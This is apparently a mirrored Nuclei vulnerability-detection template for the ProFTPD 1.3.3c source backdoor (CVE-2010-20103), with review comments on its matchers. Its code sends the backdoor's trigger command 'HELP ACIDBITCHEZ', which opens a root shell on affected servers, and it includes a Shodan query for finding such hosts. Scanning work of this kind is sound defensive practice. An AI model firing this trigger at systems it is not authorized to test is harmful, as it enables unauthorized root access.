mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-13 14:13:34 +08:00
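id: CVE-2010-20103

info:
  name: ProFTPd-1.3.3c - Backdoor Command Execution
  author: pussycat0x
  severity: critical
  description: |
    ProFTPD 1.3.3c contains a command injection backdoor caused by a hidden FTP command trigger in the source tarball, letting remote unauthenticated attackers execute arbitrary shell commands with root privileges.
  impact: |
    Unauthenticated attackers can execute arbitrary shell commands with root privileges by sending specially crafted HELP commands that trigger the hidden backdoor in the compromised source tarball.
  remediation: |
    Update to a version later than 1.3.3c or the latest available version.
  reference:
    - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
    - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
    - https://www.exploit-db.com/exploits/15662
  metadata:
    max-request: 1
    shodan-query: product:\"ProFTPD\"
  tags: cve,cve2010,js,network,proftpd,ftp,backdoor,vkev,passive,vuln

javascript:
  # Skip hosts whose FTP port does not accept connections.
  - pre-condition: |
      isPortOpen(Host,Port);

    # Sends one HELP request and exports the first string read back as `response`.
    # NOTE(review): RecvString() is called once; whether that read holds only the
    # 220 greeting or also the reply to HELP is not visible here. Confirm it
    # before relying on the 502 check below.
    code: |
      const data = "HELP ACIDBITCHEZ\r\n";
      const c = require("nuclei/net");
      const conn = c.Open('tcp', `${Host}:${Port}`);
      let resp;
      try {
        conn.Send(data);
        resp = conn.RecvString();
      } finally {
        // Release the socket even when the send or read fails.
        conn.Close();
      }
      Export(resp);

    args:
      Host: "{{Host}}"
      Port: 21

    matchers-condition: and
    matchers:
      # The positive signal is the version banner. The description attributes the
      # backdoor to the compromised source tarball, so a hit identifies a
      # 1.3.3c banner and should be followed by checking how that build was
      # obtained.
      - type: dsl
        dsl:
          - "success == true"
          - "contains(response, '220 ProFTPD 1.3.3c')"
        condition: and

      # Drop hosts that answer the HELP request with "502 Unknown command".
      # This is a DSL expression: as a `word` entry the whole expression text
      # would be searched for literally and the negative check could never fail.
      - type: dsl
        dsl:
          - "!contains(response, '502 Unknown command')"
# NOTE(review): the digest below was issued for the upstream template text; re-sign the template after any edit.
# digest: 4a0a0047304502200b6d58fdf3ef7a36e45b03ad3274878948279fd0cd22f22ecb6c11f2b7247da1022100fdd8adc4ff9c4b472791e1c5a7e4d1fde068559d9093576a5cf7269e59ba781b:922c64590222798bb761d5b6d8e72950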